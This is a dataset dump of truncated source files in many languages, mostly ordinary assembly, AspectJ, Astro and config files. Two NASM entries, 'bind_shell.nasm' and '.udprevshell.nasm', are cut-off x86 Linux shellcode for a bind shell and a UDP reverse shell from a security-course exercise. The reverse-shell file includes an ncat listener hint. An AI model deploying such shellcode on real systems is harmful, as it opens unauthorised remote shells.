-"0615681a16b08bb1ce94b7308fd9aa6d90542a91","RutaSeguida_Roo_JavaBean.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. -// You may push code into the target .java compilation unit if you wish to edit any member(s). - -package es.jcornez.ruta.entidad; - -import es.jcornez.ruta.entidad.Ruta; -import es.jcornez.ruta.entidad.RutaSeguida; -import es.jcornez.ruta.entidad.Usuario; -import java.util.Date; - -privileged aspect RutaSeguida_Roo_JavaBean { - - /** - * TODO Auto-generated method documentation - * - * @return Long - */ - public Long RutaSeguida.getId() { - return this.id; - } - - /** - * TODO Auto-generated method documentation - * - * @param id - */ - public void RutaSeguida.setId(Long id) { - this.id = id; - } - - /** - * TODO Auto-generated method documentation - * - * @return Integer - */ - public Integer RutaSeguida.getVersion() { - return this.version; - } - - /** - * TODO Auto-generated method documentation - * - * @param version - ","421","1.0169082125603865","0.0","0.0" -"0aa8dbc96edbf82ebd6a89038d5bee3a23ebc9ea","ParteService_Roo_Service.aj",".aj","AspectJ","// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO. -// You may push code into the target .java compilation unit if you wish to edit any member(s). - -package br.com.appscpj.service; - -import br.com.appscpj.domain.Parte; -import br.com.appscpj.service.ParteService; -import java.util.List; - -privileged aspect ParteService_Roo_Service { - - public abstract long ParteService.countAllPartes(); - public abstract void ParteService.deleteParte(Parte parte); - public abstract Parte ParteService.findParte(Long id); - public abstract List ParteService.findAllPartes(); - public abstract List ParteService.findParteEntries(int firstResult, int maxResults); - public abstract void ParteService.saveParte(Parte parte); - public abstract Parte ParteService.updateParte(Parte parte); -} -","421","1.0169082125603865","0.0","0.0" -"18d32678a7e3cbce39e2d03dca7f418ed4e9453a","asm_test1_yy.a51",".a51","Assembly","file->prog_block -prog_block->prog_block macro_text_line -- -prog_block->prog_block EOL -- -prog_block->prog_block EOL -- -prog_block->prog_block EOL -- -prog_block->prog_block EOL -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block label_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_block cmd_text_line -- -prog_block->prog_b","13","0.002790298347284825","0.0","0.0" -"11b3e8bb2230bc5909b44b2bdd00b469faa1f39b","(B3)CPL_C.a51",".a51","Assembly","START: - CPL C - SJMP START","13","0.002790298347284825","0.0","0.0" -"18748ba6ae15094046e3c8e3138a7d1505ea109f","klawiatura_i_ekran.a51",".a51","Assembly","LJMP START -P5 EQU 0F8H -P7 EQU 0DBH - - ; LCD registers ---------------------------------- - LCDstatus equ 0FF2EH - LCDcontrol equ 0FF2CH - LCDdataWR equ 0FF2DH - LCDdataRD equ 0FF2FH - P6 EQU 0FAH - - // LCD control bytes --------------------------------- - - #define HOME 0x80 // put curcor to second line - #define INITDISP 0x38 // LCD init (8-bit mode) - #define HOM2 0xc0 // put curcor to second line - #define LCDON 0x0e // LCD nn, cursor off, blinking of - #define CLEAR 0x01 // LCD display clear - - -ORG 0100H - -LCDcntrlWR MACRO x - LOCAL loop - loop: - MOV DPTR,#LCDstatus - MOVX A,@DPTR - JB ACC.7,loop ; check if LCD busy - - MOV DPTR,#LCDcontrol ; write to LCD control - MOV A, x - MOVX @DPTR,A - ENDM - -LCDcharWR MACRO - LOCAL loop1,","13","0.002790298347284825","0.0","0.0" -"065309eb9903e07a9d1fce34dcfcd0e0e63d471d","dscr.a51",".a51","Assembly",";;----------------------------------------------------------------------------- -;; File: dscr.a51 -;; Contents: This file contains descriptor data tables. -;; -;; $Archive: /USB/Examples/Fx2lp/bulkloop/dscr.a51 $ -;; $Date: 9/01/03 8:51p $ -;; $Revision: 3 $ -;; -;; -;;----------------------------------------------------------------------------- -;; Copyright 2003, Cypress Semiconductor Corporation -;;-----------------------------------------------------------------------------;;----------------------------------------------------------------------------- - -DSCR_DEVICE equ 1 ;; Descriptor type: Device -DSCR_CONFIG equ 2 ;; Descriptor type: Configuration -DSCR_STRING equ 3 ;; Descriptor type: String -DSCR_INTRFC equ 4 ;; Descriptor type: Interface -DSCR_ENDPNT equ 5 ;; Descriptor type: Endpoint -DSCR_DEVQUAL equ 6 ;; Descriptor type: Device Qualifier - -DSCR_DEVICE_LEN equ 18 -DSCR_CONFIG_LEN equ 9 -DSCR_INTRFC_LEN equ 9 -D","13","0.002790298347284825","0.0","0.0" -"0fb426ef2271e4810d0b806cdad43611731d17c5","enhanced_selector_fselinit.A51",".a51","Assembly","#include - -EXTRN ECODE(sfselInit??) - -MIDAPI SEGMENT ECODE - -rseg MIDAPI - -/////////////////////////////////////////////// -public fselInit?? -fselInit??: -MOV WR8,#WORD0(sfselInit??) -MOV R10, #BYTE2(sfselInit??) -LJMP RSTMIDAPI - -END","13","0.002790298347284825","0.0","0.0" -"0fccf5f1c09ab1100e1e6a72baeea63ee5abe905","jump_x86_64_ms_pe_masm.asm",".asm","Assembly"," -; Copyright Oliver Kowalke 2009. -; Distributed under the Boost Software License, Version 1.0. -; (See accompanying file LICENSE_1_0.txt or copy at -; http://www.boost.org/LICENSE_1_0.txt) - -; ---------------------------------------------------------------------------------- -; | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | -; ---------------------------------------------------------------------------------- -; | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | -; ---------------------------------------------------------------------------------- -; | R12 | R13 | R14 | R15 | -; ---------------------------------------------------------------------------------- -; ---------------------------------------------------------------------------------- -; | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | -; ----------","3449","0.7402876153681047","0.0","0.0" -"15d5133d25bc8644926624dd29798ec37d447ed5","play.asm",".asm","Assembly","; Stand-alone executable for playing an Oidos song. - -%include ""oidos.inc"" - -global _main - -extern __imp__fopen -extern __imp__fwrite -extern __imp__fclose -extern __imp__printf -extern __imp__GetAsyncKeyState@4 -extern __imp__ExitProcess@4 -extern __imp__Sleep@4 - - section main text align=1 - -_main: - push message - push messageformat - call [__imp__printf] - add esp, byte 2*4 - - call _Oidos_FillRandomData - call _Oidos_GenerateMusic - -%ifdef WRITE_WAV - push wavname - push wavformat - call [__imp__printf] - add esp, byte 2*4 - - push filemode - push wavname - call [__imp__fopen] - add esp, byte 2*4 - - push eax - push eax - push eax - push byte 44 - push byte 1 - push _Oidos_WavFileHeader - call [__imp__fwrite] - add esp, byte 3*4 - - push dword [_Oidos_WavFileHeader+40] - push byte 1 - push _Oidos_MusicBuffer - call [__imp__fwrite] - add esp, byte 3*4 - - call [__imp__fclose] - add esp, byte 1*4 -%endif - - call _Oidos_StartMusic - -.playloop: - mov ebx, 60 - - fild dword [_Oidos_MusicLength] - fdiv dword [_Oidos_TicksPerSecond]","3449","0.7402876153681047","0.0","0.0" -"069eb99cd2fa0743293d83e50ff36bfdd893b01a","rage.asm",".asm","Assembly","BattleCommand_Rage: ; 36f1d -; rage - ld a, BATTLE_VARS_SUBSTATUS4 - call GetBattleVarAddr - set SUBSTATUS_RAGE, [hl] - ret - -; 36f25 -","3449","0.7402876153681047","0.0","0.0" -"0f1f75915f73285ca947ea3d83a557ee25002336","tapu_lele.asm",".asm","Assembly"," dw 00786 ;national dex no - - db 70, 85, 75, 95, 130, 115 - evs 0, 0, 0, 0, 3, 0 - ; hp atk def spd sat sdf - - db PSYCHIC, FAIRY ; type - db 3 ; catch rate - db 257 ; base exp - db NO_ITEM, NO_ITEM ; items - dn GENDERLESS, 3 ; gender, step cycles to hatch - INCBIN ""gfx/pokemon/tapu_lele/front.dimensions"" - db PSYCHIC_SURGE, PSYCHIC_SURGE ; abilities - db TELEPATHY ; hidden ability - db GROWTH_SLOW ; growth rate - dn EGG_NONE, EGG_NONE ; egg groups - - ; tm/hm learnset - tmhm - ; end","3449","0.7402876153681047","0.0","0.0" -"08e06a33fa5570805c692793249391154fe616a5","FPSHack_08_STControl_CheckUpTrigger_LowHz.asm",".asm","Assembly","#To be inserted at 800586a8 -############################################# -##FPSHack_08_STControl_CheckUpTrigger_LowHz## -############################################# - -lis r17, 0x817F -lwz r17, 0x0000 (r17) #Load LowHzFuncsRunThisFrame into r0 - -cmpwi r17, 1 #Check if LowHzFuncsRunThisFrame == true - -##### -beq- 0x000C -##False -li r3, 0 #Return false for trigger -blr -##True -lha r0, 0x0010 (r3) #VANILLA -#####","3449","0.7402876153681047","0.0","0.0" -"09ac6b49591bcb4c9f3526f0bf6e485a29177970","drivers--block--drbd--drbd.ko_047.7407cf3.32_7a.cil_true-unreach-call.i",".i","Assembly","extern void __VERIFIER_error() __attribute__ ((__noreturn__)); - -/* Generated by CIL v. 1.5.1 */ -/* print_CIL_Input is false */ - -typedef signed char __s8; -typedef unsigned char __u8; -typedef short __s16; -typedef unsigned short __u16; -typedef int __s32; -typedef unsigned int __u32; -typedef long long __s64; -typedef unsigned long long __u64; -typedef unsigned char u8; -typedef unsigned short u16; -typedef int s32; -typedef unsigned int u32; -typedef long long s64; -typedef unsigned long long u64; -typedef unsigned short umode_t; -typedef u64 dma_addr_t; -typedef unsigned int __kernel_mode_t; -typedef unsigned long __kernel_nlink_t; -typedef long __kernel_off_t; -typedef int __kernel_pid_t; -typedef unsigned int __kernel_uid_t; -typedef unsigned int __kernel_gid_t; -typedef unsigned long __kernel_size_t; -typedef long __kernel_ssize_t; -typedef long __kernel_time_t; -typedef long __kernel_clock_t; -typedef int __kernel_timer_t; -typedef int __kernel_clockid_t; -typedef long long __kernel_loff_t; -typedef __kernel","379","0.08134792874007298","0.0","0.0" -"127a53a8ddbeaed4df5bbe8f56f788b70ae3c7e3","nonUniformElemOpenJet.i",".i","Assembly","Simulations: - - name: sim1 - time_integrator: ti_1 - optimizer: opt1 - -linear_solvers: - - - name: solve_scalar - type: tpetra - method: gmres - preconditioner: sgs - tolerance: 1e-5 - max_iterations: 50 - kspace: 50 - output_level: 0 - - - name: solve_cont - type: tpetra - method: gmres - preconditioner: muelu - tolerance: 1e-5 - max_iterations: 50 - kspace: 50 - output_level: 0 - muelu_xml_file_name: ../../xml/matches_ml_default.xml - -realms: - - - name: realm_1 - mesh: ../../mesh/2cm_ped_35K_mks.g - use_edges: no - - equation_systems: - name: theEqSys - max_iterations: 2 - - solver_system_specification: - velocity: solve_scalar - pressure: solve_cont - mass_fraction: solve_scalar - - systems: - - - LowMachEOM: - name: myLowMach - max_iterations: 1 - convergence_tolerance: 1e-5 - - - MassFraction: - name: myYk - max_iterations: 1 - convergence_tole","379","0.08134792874007298","0.0","0.0" -"0a7f85573f41e963415a4a4feff575a5763d03a6","output_residual_test.i",".i","Assembly","[Mesh] - file = sq-2blk.e - uniform_refine = 3 -[] - -[Variables] - # variable in the whole domain - [./u] - order = FIRST - family = LAGRANGE - - [./InitialCondition] - type = ConstantIC - value = 0 - [../] - [../] - - # subdomain restricted variable - [./v] - order = FIRST - family = LAGRANGE - block = '1' - [../] -[] - -[Functions] - [./forcing_fn] - type = ParsedFunction - # dudt = 3*t^2*(x^2 + y^2) - value = 3*t*t*((x*x)+(y*y))-(4*t*t*t) - [../] - - [./exact_fn] - type = ParsedFunction - value = t*t*t*((x*x)+(y*y)) - [../] - - [./exact_fn_v] - type = ParsedFunction - value = t+1 - [../] -[] - -[Kernels] - [./ie_u] - type = TimeDerivative - variable = u - [../] - - [./diff_u] - type = Diffusion - variable = u - [../] - - [./ffn_u] - type = UserForcingFunction - variable = u - function = forcing_fn - [../] - - - [./ie_v] - type = TimeDerivative - variable = v - [../] - - [./diff_v] - type = Diffusion - variable = v - [../] - -[] - -[BCs] - [./all_","379","0.08134792874007298","0.0","0.0" -"05358e8cd933a70a780359b14387af155d6429dc","drivers--net--can--usb--ems_usb.ko_004.d0e1e88.08_1a.cil_true-unreach-call.i",".i","Assembly","extern void abort(void); -void reach_error(){} - -/* Generated by CIL v. 1.5.1 */ -/* print_CIL_Input is false */ - -typedef signed char __s8; -typedef unsigned char __u8; -typedef short __s16; -typedef unsigned short __u16; -typedef int __s32; -typedef unsigned int __u32; -typedef long long __s64; -typedef unsigned long long __u64; -typedef unsigned char u8; -typedef unsigned short u16; -typedef int s32; -typedef unsigned int u32; -typedef long long s64; -typedef unsigned long long u64; -typedef unsigned short umode_t; -typedef u64 dma_addr_t; -typedef unsigned int __kernel_mode_t; -typedef unsigned long __kernel_nlink_t; -typedef long __kernel_off_t; -typedef int __kernel_pid_t; -typedef unsigned int __kernel_uid_t; -typedef unsigned int __kernel_gid_t; -typedef unsigned long __kernel_size_t; -typedef long __kernel_ssize_t; -typedef long __kernel_time_t; -typedef long __kernel_clock_t; -typedef int __kernel_timer_t; -typedef int __kernel_clockid_t; -typedef long long __kernel_loff_t; -typedef __kernel_uid_t __kernel_","379","0.08134792874007298","0.0","0.0" -"12d47a9c06e6f4d919a3b17595e021a243dcc96b","armoct01.i",".i","Assembly","/* GUI CONVERTED from armoct01.i (converter v1.75) Sun Aug 13 21:19:26 2000 */ -/* armoct01.i - AR MEMO PRINT HEADER FOR CANDIAN TAXES */ -/* Copyright 1986-2000 QAD Inc., Carpinteria, CA, USA. */ -/* All rights reserved worldwide. This is an unpublished work. */ -/*F0PN*/ /*V8:ConvertMode=Report */ -/*K1Q4*/ /*V8:RunMode=Character,Windows */ -/* REVISION: 7.4 LAST MODIFIED: 09/17/93 BY: JJS *H158* */ -/* REVISION: 8.6 LAST MODIFIED: 02/18/97 BY: *K06Z* M. Madison */ -/* REVISION: 8.6 LAST MODIFIED: 04/09/97 BY: *J1NK* R. McCarthy */ - - -/* REVISION: 8.6E LAST MODIFIED: 02/23/98 BY: *L007* A. Rahane */ -/* REVISION: 8.6E LAST MODIFIED: 05/20/98 BY: *K1Q4* Alfred Tan */ -/* REVISION: 8.6E LAST MODIFIED: 10/04/98 BY: *J314* Alfred Tan */ -/* REVISION: 9.0 LAST MODIFIED: 03/10/99 BY: *M0B3* Michael Amaladhas */ -/*","379","0.08134792874007298","0.0","0.0" -"01d6f24f1c159290f26543b6621cb58e34309f53","6502-inline_delay-keepaxcd-w200-a25-rti.inc",".inc","Assembly","; delay_n, delays n cycles with small code -; Will clobber Y, Z+N, and V -; Will preserve A, X, S, C, D, and I (interrupt-disable flag) -; -; Requires a dummy interrupt handler that does nothing but RTI. -; -; Requires that a label @nearby_rts is defined, -; that points _somewhere_ that contains a $60 byte (RTS). -; -; Requires that a label @nearby_rts_14cyc is defined, -; that points _somewhere_ that contains a dummy 2-cycle -; opcode, such as NOP or LDA #1, followed by a $60 byte (RTS). -; -; Requires that a label @nearby_rts_15cyc is defined, -; that points _somewhere_ that contains a JMP to a location that does RTS. -; -; Requires a function called ""delay_a_25_clocks"" -; that is defined as follows: -;;;;;;;;;;;;;;;;;;;;;;;;; -;; Delays A clocks + overhead -;; Clobbers A. Preserves X,Y. -;; Time: A+25 clocks (including JSR) -;;;;;;;;;;;;;;;;;;;;;;;;; -; ; Cycles Accumulator Carry flag -; ; 0 1 2 3 4 5 6 (hex) 0 1 2 3 4 5 ","971","0.2084138227087358","0.0","0.0" -"0db3b80d03e51bcf1b4dfb0efb3bf3186be4fbf3","6502-inline_delay-keepaxycd-a25-rti-unsafe-nofc-rts15.inc",".inc","Assembly","6502-inline_delay-keepaxycd-a25-rti-nofc-rts15.inc","971","0.2084138227087358","0.0","0.0" -"0194406088920f45ff9ed4cc0bd83dc86ca75f04","6502-inline_delay-keepaczndv-a25-xa30-relocatable-rts15.inc",".inc","Assembly","; delay_n, delays n cycles with small code -; Will clobber X, and Y -; Will preserve A, S, and P -; -; Requires that a label @nearby_rts is defined, -; that points _somewhere_ that contains a $60 byte (RTS). -; -; Requires that a label @nearby_rts_15cyc is defined, -; that points _somewhere_ that contains a JMP to a location that does RTS. -; -; Requires a function called ""delay_256x_a_30_clocks"" -; that is defined as follows: -;;;;;;;;;;;;;;;;;;;;;;;;; -;; Delays X*256 clocks + overhead -;; Clobbers A,X. Preserves Y. -;; Depends on delay_a_25_clocks within short branch distance -;; Time: X*256+16 clocks (including JSR) -;;;;;;;;;;;;;;;;;;;;;;;;; -;delay_256x_a_30_clocks: -; cpx #0 -; beq delay_a_25_clocks -; ;4 cycles done. Loop is 256 cycles -;: pha -; lda #(256-7-2-2-3) -; jsr delay_a_25_clocks -; pla -; dex -; beq delay_a_25_clocks ; count as 2 -; bne :- -; ;Loop end is -1+1 = 0 cycles. Total: 4+JSR+RTS = 16 -; -; Requires a function called ""delay_a_25_clocks"" -; that is defined as follows: -;;;;;;;;;;;;;;","971","0.2084138227087358","0.0","0.0" -"033de09218b3aa27defc04425be0f8c8de393b9c","account_offset_type.inc",".inc","Assembly","[% SWITCH account_offset.type %] - [% CASE 'Credit Applied' %]Credit applied - [% CASE 'Payment' %]Payment - [% CASE 'Manual Credit' %]Manual credit - [% CASE 'Manual Debit' %]Manual invoice - [% CASE 'Lost Item Return' %]Lost item returned - [% CASE 'Writeoff' %]Writeoff - [% CASE 'Void Payment' %]Void payment - [% CASE %][% account_offset.type %] -[%- END -%] -","971","0.2084138227087358","0.0","0.0" -"08c07d391373c716835c947fd5b37e8d0633301d","6502-inline_delay-keepxv-a27-ax33-nofc-relocatable-norts.inc",".inc","Assembly","6502-inline_delay-keepxv-a27-ax33-nofc-norts.inc","971","0.2084138227087358","0.0","0.0" -"0e9055c49aa709616e9db0ff6d73b96c320cc463","ipl.nas",".nas","Assembly","; haribote-ipl -; TAB=4 - -CYLS EQU 10 ; どこまで読み込むか - - ORG 0x7c00 ; このプログラムがどこによみこまれるのか - -; 以下は標準的なFAT12フォーマットフロッピーディスクのための記述 - - JMP entry - DB 0x90 - DB ""HARIBOTE"" ; ブートセクタの名前を自由に書いてよい（8バイト） - DW 512 ; 1セクタの大きさ（512にしなければいけない） - DB 1 ; クラスタの大きさ（1セクタにしなければいけない） - DW 1 ; FATがどこから始まるか（普通は1セクタ目からにする） - DB 2 ; FATの個数（2にしなければいけない） - DW 224 ; ルートディレクトリ領域の大きさ（普通は224エントリにする） - DW 2880 ; このドライブの大きさ（2880セクタにしなければいけない） - DB 0xf0 ; メディアのタイプ（0xf0にしなければいけない） - DW 9 ; FAT領域の長さ（9セクタにしなければいけない） - DW 18 ; 1トラックにいくつのセクタがあるか（18にしなければいけない） - DW 2 ; ヘッドの数（2にしなければいけない） - DD 0 ; パーティションを使ってないのでここは必ず0 - DD 2880 ; このドライブ大きさをもう一度書く - DB 0,0,0x29 ; よくわからないけどこの値にしておくといいらしい - DD 0xffffffff ; たぶんボリュームシリアル番号 - DB ""HARIBOTEOS "" ; ディスク��名前（11バイト） - DB ""FAT12 "" ; フォーマットの名前（8バイト） - RESB 18 ; とりあえず18バイトあけておく - -; プログラム本体 - -entry: - MOV AX,0 ; レジスタ初期化 - MOV SS,AX - MOV SP,0x7c00 - MOV DS,AX - -;ディスクを読む - MOV AX,0x0820 - M","31","0.006653788366602275","0.0","0.0" -"0c844b102d9abecd3985959a6081c37542d4c632","wcsncpy.nas",".nas","Assembly","; Software License Agreement -; -; Copyright(C) 1994-2022 David Lindauer, (LADSoft) -; -; This file is part of the Orange C Compiler package. -; -; The Orange C Compiler package is free software: you can redistribute it and/or modify -; it under the terms of the GNU General Public License as published by -; the Free Software Foundation, either version 3 of the License, or -; (at your option) any later version. -; -; The Orange C Compiler package is distributed in the hope that it will be useful, -; but WITHOUT ANY WARRANTY; without even the implied warranty of -; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -; GNU General Public License for more details. -; -; You should have received a copy of the GNU General Public License -; along with Orange C. If not, see . -; -; As a special exception, if other files instantiate templates or -; use macros or inline functions from this file, or you compile -; ","31","0.006653788366602275","0.0","0.0" -"0ceb4e3ebc8bae100e57d3caf3dda0d6a90f76ce","api004.nas",".nas","Assembly","; api004.nas,系统调用号为4的系统调用-结束应用程序 - -; 同 api001.nas -[FORMAT ""WCOFF""] -[INSTRSET ""i486p""] -[BITS 32] -[FILE ""api004.nas""] - - GLOBAL _api_end - -[SECTION .text] -; 同 api001.nas - -; _api_end, -; 退出应用程序 -_api_end: ; void api_end(void); - MOV EDX,4 ; EDX=系统调用号,见 hrb_api() - INT 0x40 ; 进入内核执行 _asm_hrb_api,见 init_gdtidt() - ; _asm_hrb_api 执行EDX=4的子程序后将调用 _asm_end_app 结束引用程序","31","0.006653788366602275","0.0","0.0" -"081e1377fb5def88928b8dcf2794cb5a0eaf907e","sph285_02a.nas",".nas","Assembly","ID c:\Users\Dima\Lame3d2\IDE,FEMAP -SOL SESTATICS -TIME 10000 -CEND - ECHO = NONE - DISPLACEMENT(PLOT) = ALL - SPCFORCE(PLOT) = ALL - OLOAD(PLOT) = ALL - FORCE(PLOT,CORNER) = ALL - STRESS(PLOT,CORNER) = ALL -BEGIN BULK -$ *************************************************************************** -$ Written by : FEMAP -$ Version : 7.00 -$ Translator : MSC/NASTRAN -$ From Model : c:\Users\Dima\Lame3d2\IDENT_17may2006\Ident\Exe\box2d_fulleren\Solid\model.MOD -$ Date : Mon May 22 14:35:35 2006 -$ *************************************************************************** -$ -PARAM,POST,-1 -PARAM,OGEOM,NO -PARAM,AUTOSPC,YES -PARAM,GRDPNT,0 -CORD2C 1 0 0. 0. 0. 0. 0. 1.+FEMAPC1 -+FEMAPC1 1. 0. 1. -CORD2S 2 0 0. 0. 0. 0. 0. 1.+FEMAPC2 -+FEMAPC2 1. 0. 1. -$ FEMAP Load Set 111 : Inclusion BSOURCE 0.3945 0.3945 0.285 0.285 0. -$ FEMAP Property 1 : Matrix","31","0.006653788366602275","0.0","0.0" -"0885e240828d2aff419214b46e641f6d69642397","haribote.nas",".nas","Assembly","; haribote-os -; TAB=4 - - ORG 0xc200 ; 程序将被装载的地方 - -fin: - HLT - JMP fin","31","0.006653788366602275","0.0","0.0" -"0f8a3c281c8313e6350bbd68fc1618120e7bb697","bind_shell.nasm",".nasm","Assembly","; Original Author: Julien Ahrens (@MrTuxracer) -; Addtional review and comments: Matteo Malvica @matteomalvica -; Website: http://www.matteomalvica.com - -global _start - -section .text -_start: - -; -; int socketcall(int call, unsigned long *args); -; sockfd = socket(int socket_family, int socket_type, int protocol); -; -push 0x66 -pop eax ;syscall: sys_socketcall + cleanup eax register -push 0x1 ;function call 0x01 for above syscall -pop ebx ;sys_socket (0x1) + cleanup ebx register -xor esi, esi ;cleanup esi register -push esi ;protocol=IPPROTO_IP (0x0) -push ebx ;socket_type=SOCK_STREAM (0x1) still holgind 0x1 -push 0x2 ;socket_family=AF_INET (IPv4 address family) -mov ecx, esp ;save pointer (ESP) to socket() args (ECX) -int 0x80 ;exec SYS_SOCKET - -; int socketcall(int call, unsigned long *args); -; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen); -; -pop edi ; pop 0x2 to edi -xchg edi, eax; save eax result 0x2 (sockfd) for later usage in EDI -xchg ebx, eax ;sys_bind (0x2) -mov a","44","0.0094440867138871","0.0","0.0" -"08277ae18cc261d997615242d7f8297baae6b888",".udprevshell.nasm",".nasm","Assembly","; SLAE-X -; thanks to writesup from previou students :] -; assignment: 2. create a reverse shell -; originality: using UDP instead TCP -; usage : sudo ncat -lup 53 on the receiving end -; warning, this shellcode might contains null byte if you use certain ip / address - - -%define htons(x) ((x >> 8) & 0xFF) | ((x & 0xFF) << 8) -%define _port 5353; -PORT equ htons(_port); - -_ip equ 0x0100007F; loopback 127.0.0.1 test -; warning use non null byte address here -; 127.1.1.1 has issue on UDP fyi - -global _start - -_start: - -; we create a socket fd, using again syscall 0x66 and argument SYS_SOCKET so ebx = 1 -push 0x66 -pop eax -push 0x1 -pop ebx -xor ecx,ecx -push ecx -; but this times it will be a SOCK_DGRAM UDP, so 0x2 as argument -push 0x2 -push 0x2 -mov ecx,esp -int 0x80 -; saving fd - -; then we call connect on this UDP socket (to use send()) -; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen); -; we push ip address as argument -push _ip; -xor","44","0.0094440867138871","0.0","0.0" -"0607da4623ca81bcf0cb980d46382554c0d8544c","new.nasm",".nasm","Assembly","; This program reads an Integer from the user and displays it on the screen -; readInput.nasm -; Author: Shubham Kumar - - -global _start - -section .text - - - -_start: - - mov eax, 0x3 - mov ebx, 0x1 - mov ecx, var1 - mov edx, 0x0a - int 0x80 - - mov eax, 0x4 - mov ebx, 0x1 - mov ecx, var1 - mov edx, 0xa - int 0x80 - - mov ebx, eax - mov eax, 0x4 - mov ecx, var2 - mov edx, 1024 - - mov eax, 0x1 - mov ebx, 0x4 - int 0x80 - -section .data - - message: db ""Enter a number: "", 0x00 - mlen equ $-message - -section .bss - var1 resb 10 - var2 rest 1024 -","44","0.0094440867138871","0.0","0.0" -"0df45a71ccfdc9993f9970cc0674e8a2e8bfa616","test2.nasm",".nasm","Assembly","global_start -section .text - -hook_dosFsOpen: - push ebp - mov ebp,esp - sub esp,xxh - - call __hook_dosFsOpen - - push xxxxxxh - ret - -hook_dosFsClose: - push ebp - mov ebp,esp - sub esp,xxh - - call __hook_dosFsClose - - push xxxxxxh - ret - - -hook_dosFsCreate: - push ebp - mov ebp,esp - sub esp,xxh - - call __hook_dosFsCreate - - push xxxxxxh - ret - - -hook_dosFsDelete: - push ebp - mov ebp,esp - sub esp,xxh - - call __hook_dosFsDelete - - push xxxxxxh - ret - - -hook_dosFsRead: - push ebp - mov ebp,esp - sub esp,xxh - - call __hook_dosFsRead - - push xxxxxxh - ret - - -hook_dosFsWrite: - push ebp - mov ebp,esp - sub esp,xxh - - call __hook_dosFsWrite - - push xxxxxxh - ret - -read_ebp: - push ebp - mov ebp,esp - mov eax,ebp - mov esp,ebp - pop ebp - ret - lea esi,[esi+0x0] - -pathcmp: - push ebp - mov ebp,esp - sub esp,0xc - push edi - xor edi,edi - push esi - mov esi,DWORD[ebp+0xc] - push ebx - mov ebx,DWORD[ebp+0x8] - sub esp,0xc - ","44","0.0094440867138871","0.0","0.0" -"0a1bf41a3db9492022b717d3b85b0a5fd55fefc6","multiboot.nasm",".nasm","Assembly","; -; Copyright (c) 2020 Bitdefender -; SPDX-License-Identifier: Apache-2.0 -; - -%ifndef _MULTIBOOT_YASM_ -%define _MULTIBOOT_YASM_ -%include ""struct.nasm"" -%include ""macros.nasm"" - -%ifdef DOC_FILE - multiboot.nasm - contains the definition for the MULTIBOOT_INFO structure and related data types. - Used during system boot. -%endif - -_struc MULTIBOOT_HEADER - dword (magic) - dword (flags) - dword (checksum) - dword (header_addr) - dword (load_addr) - dword (load_end_addr) - dword (bss_end_addr) - dword (entry_addr) - dword (mode_type) - dword (width) - dword (height) - dword (depth) -_endstruc - - -MULTIBOOT_HEADER_SIZE equ 48 ; check out '3.1.1 The layout of Multiboot header' -MULTIBOOT_HEADER_MAGIC equ 0x1BADB002 -MULT","44","0.0094440867138871","0.0","0.0" -"0f153b12acd6e660fecf4d814517692c0aa09362","headnote.astro",".astro","Astro"," - -
- This résumé is generated from a live website. - You can find it at cv.stevensinatra.id -
-","11","1.2222222222222223","0.0","0.0" -"013539eb56e915a2e66171f9493bcf5c77f2cabb","HeaderLink.astro",".astro","Astro","--- -export interface Props extends astroHTML.JSX.AnchorHTMLAttributes {} - -const { href, class: className, ...props } = Astro.props; -const isActive = href === Astro.url.pathname; ---- - - - - - -","11","1.2222222222222223","0.0","0.0" -"11028872aa14f5d9cb2f63a0121c3e81afcd56ef","art_post.astro",".astro","Astro","--- -import MainHead from '../components/MainHead.astro'; -import Footer from '../components/Footer/index.jsx'; -import Nav from '../components/Nav/index.jsx'; - -const { content } = Astro.props; ---- - - - - - -
-

Programming Languages

-

- JavaScript (ESNext), TypeScript / Flow, HTML, CSS/SASS, GraphQL, PHP, Ruby -

- -

Framework / Libraries

-

React, Material UI, Gatsby, Jekyll, Node.js, Storybook

- -

Tools / Platforms

-

Git, Webpack, Babel, AWS, Docker, ESLint, Jest

-
-","11","1.2222222222222223","0.0","0.0" -"088f47b9d8465ad6eb0d9216ef6cebfb6e55bb39","BooksList.astro",".astro","Astro","--- -const books = await Astro.glob('../../pages/book/*.md'); -const publishedBooks = books.filter(book => (book.frontmatter.draft != true)).filter(book => (book.frontmatter.editions != null)) - -const sortedBooks = publishedBooks.sort( - (a, b) => new Date(b.frontmatter.date) - new Date(a.frontmatter.date) -); ---- -","11","1.2222222222222223","0.0","0.0" -"11c4ddec5b7e53d2aec304b133f1b5b006916c16","amc12_12.asy",".asy","Asymptote","settings.outformat=""svg""; -import olympiad; -unitsize(15); - -//Choice Asize(100);defaultpen(linewidth(0.7)+fontsize(8));real end=4.5;draw((-end,0)--(end,0), EndArrow(5));draw((0,-end)--(0,end), EndArrow(5));real ticks=0.2, four=3.7, r=0.1;draw((1,ticks)--(1,-ticks)^^(-1,ticks)--(-1,-ticks)^^(four,ticks)--(four,-ticks)^^(-four,ticks)--(-four,-ticks));label(""$x$"", (4,0), N);label(""$y$"", (0,4), W);label(""$-4$"", (-4,-ticks), S);label(""$-1$"", (-1,-ticks), S);label(""$1$"", (1,-ticks), S);label(""$4$"", (4,-ticks), S);real f(real x) {return 0.101562 x^4+0.265625 x^3+0.0546875 x^2-0.109375 x+0.125;}real g(real x) {return 0.0625 x^4+0.0520833 x^3-0.21875 x^2-0.145833 x-2.5;}draw(graph(f,-four, four), 